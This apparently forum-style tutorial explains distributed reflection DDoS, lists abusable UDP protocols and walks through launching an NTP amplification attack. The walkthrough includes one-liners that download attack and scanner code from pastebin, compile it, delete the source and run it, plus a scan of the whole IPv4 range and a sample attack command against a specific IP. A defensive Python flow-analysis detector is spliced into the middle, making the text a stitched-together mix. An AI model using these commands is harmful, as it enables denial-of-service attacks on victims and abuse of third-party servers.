DrDoS
1.0 Introduction to DrDoS
Distributed Reflection Denial of Service, also known as DrDoS, has been used for years to create some of the world's largest DDoS attacks! Over the past 5-6 years it has gotten so easy that now anyone can do it with just $10 and some basic knowledge of the Linux OS. Many people use DrDoS in combination with botnets; controlling mass quantities of bots that are each able to launch a reflected attack can be overpowering for some targets. DrDoS is often used by DDoS-for-hire sites.
Reflection takes advantage of UDP services. UDP, by design, is a connectionless internet protocol in which the receiver does not validate the IPv4 source address of a packet. This lack of validation makes it possible for someone to pretend to be you! Since the packets appear to come from the target's IP, the service sends all of its responses back to said IP. This serves two purposes for the attacker: he can hide his identity, and the responses greatly amplify the attack.
1.1 Types of Amplification Vectors
In the past there was only DNS amplification, until people started experimenting with other UDP-based protocols. Each protocol has a different Bandwidth Amplification Factor, meaning one method might amplify
100Mbps -> 5000Mbps while another might only give you 100Mbps -> 1000Mbps.
Here is but a short list of protocols you can abuse:
DNS
CHARGEN
NTP
SNMPv2
SSDP
Quote of the Day
Teamspeak 3
Quake Network Protocol
BitTorrent
NetBIOS
MSSQL
PORTMAP
RIP
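From the defender's side, the two properties described above (responses arriving from reflector ports that the receiving host never requested, and response volume far exceeding request volume) are exactly what a flow collector can alert on. The following is an added example, not code from this tutorial: it runs a simple reflection check over a handful of constructed NetFlow-style records. The `Flow` record layout, the port-to-service table and the thresholds (`min_reflectors`, `min_ratio`) are assumptions of this example and would be tuned per network.

```python
"""Detect inbound UDP reflection/amplification traffic from flow records.

Added example for the DrDoS write-up; the record layout, the port table and
the thresholds are assumptions, not part of the original text.
"""
from collections import defaultdict
from dataclasses import dataclass

# UDP source ports of the reflector services named in section 1.1.
# Well-known port numbers; the mapping itself is an assumption of this example.
REFLECTOR_PORTS = {
    53: "DNS", 19: "CHARGEN", 123: "NTP", 161: "SNMP", 1900: "SSDP",
    17: "QOTD", 111: "PORTMAP", 137: "NetBIOS", 1434: "MSSQL", 520: "RIP",
}


@dataclass(frozen=True)
class Flow:
    """One unidirectional flow record as a collector would export it (assumed layout)."""
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    nbytes: int


def detect_reflection(flows, min_reflectors=3, min_ratio=5.0):
    """Return one alert per (victim, service) where many distinct reflectors
    send far more bytes to the victim than the victim ever sent to that port.

    A legitimate client sends a request and gets a comparable reply; a spoofed
    victim receives replies it never requested, so bytes_sent stays near zero.
    """
    req_bytes = defaultdict(int)     # (host, service_port) -> bytes host sent out
    reply_srcs = defaultdict(set)    # (host, service_port) -> distinct reflector IPs
    reply_bytes = defaultdict(int)   # (host, service_port) -> bytes host received

    for f in flows:
        if f.proto != "UDP":         # reflection here is a UDP phenomenon
            continue
        if f.dport in REFLECTOR_PORTS:
            req_bytes[(f.src, f.dport)] += f.nbytes
        if f.sport in REFLECTOR_PORTS:
            key = (f.dst, f.sport)
            reply_srcs[key].add(f.src)
            reply_bytes[key] += f.nbytes

    alerts = []
    for (victim, port), srcs in reply_srcs.items():
        sent = req_bytes.get((victim, port), 0)
        recv = reply_bytes[(victim, port)]
        # bytes received per byte sent; a host that sent nothing gets "infinite" amplification
        ratio = recv / sent if sent else float("inf")
        if len(srcs) >= min_reflectors and ratio >= min_ratio:
            alerts.append({
                "victim": victim,
                "service": REFLECTOR_PORTS[port],
                "reflectors": len(srcs),
                "bytes_sent": sent,
                "bytes_received": recv,
                "ratio": ratio,
            })
    return sorted(alerts, key=lambda a: a["bytes_received"], reverse=True)


# Constructed sample flows (RFC 5737 documentation addresses, not real hosts).
SAMPLE_FLOWS = [
    # Legitimate NTP client: 48-byte request, 48-byte reply from one server.
    Flow("198.51.100.20", 40123, "203.0.113.1", 123, "UDP", 48),
    Flow("203.0.113.1", 123, "198.51.100.20", 40123, "UDP", 48),
    # 198.51.100.7 never sent an NTP request, yet receives large replies from many servers.
    Flow("203.0.113.10", 123, "198.51.100.7", 80, "UDP", 440_000),
    Flow("203.0.113.11", 123, "198.51.100.7", 80, "UDP", 452_000),
    Flow("203.0.113.12", 123, "198.51.100.7", 80, "UDP", 438_000),
    Flow("203.0.113.13", 123, "198.51.100.7", 80, "UDP", 445_000),
    # TCP traffic from port 123 is not reflection and must be ignored.
    Flow("203.0.113.14", 123, "198.51.100.7", 443, "TCP", 1500),
    # One DNS query with a larger reply: high ratio but a single source, so not flagged.
    Flow("198.51.100.9", 5353, "203.0.113.53", 53, "UDP", 60),
    Flow("203.0.113.53", 53, "198.51.100.9", 5353, "UDP", 512),
]


if __name__ == "__main__":
    for alert in detect_reflection(SAMPLE_FLOWS):
        print(alert)
```

The single-source DNS case shows why the reflector count matters as much as the ratio: one big answer to one query is normal resolver behaviour, while many servers answering a host that asked none of them is the reflection signature. On a real collector, flows are usually sampled and time-bucketed, so the byte counts and thresholds would need to be scaled to the sampling rate and window.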
2.0 Launching a DrDoS Attack
This tutorial is focused around the NTP attack vector.
Here is what you will need for this
- Common Sense
- Spoofed Dedicated Server with Ubuntu 14.04 64bit Installed
- Server for reflector scanning
1.) First you need to set up your attacking server. You can log in using an SSH client called PuTTY.
2.) You will need to install the dependencies required to run the attack script:
Code:
apt-get install gcc wget
3.) Now install the NTP Attack Script:
Code:
wget -q http://pastebin.com/raw/fcyCGWqw -O ntp.c; gcc -o ntp ntp.c -pthread; rm -rf ntp.c; ./ntp
4.) Here is where you log in to your scanning server and run these commands:
Code:
apt-get install gcc wget -y; wget -q http://pastebin.com/raw/XWFfm5hh -O ntpscan.c; gcc -o ntpscan ntpscan.c -pthread; rm -rf ntpscan.c; ./ntpscan
Code:
Example for scanning: ./ntpscan 1.0.0.0 255.255.255.255 ntp.txt 3 5
Should look something like this:
5.) Filtering your reflection lists:
You will often get duplicate IPs in one list. Sort out any duplicate IPs:
cat scanned.txt | sort -u > unique.txt
Keep only IPs whose response size is above a certain threshold (ex: 300):
cat scannedlist.txt |awk '{if($2>300)print $1}' | sort -u > output.txt
6.) Now log back into your attacking server and upload your new filtered reflection list of NTP servers, then use this command to start an attack. Time is in seconds.
Ex: ./ntp 75.14.61.198 ntp.txt 1 -1 300
Code:
Usage: ./ntp [IP] [file] [threads] [limiter] [time]
7.) Here are some results of the successful amplification against another target: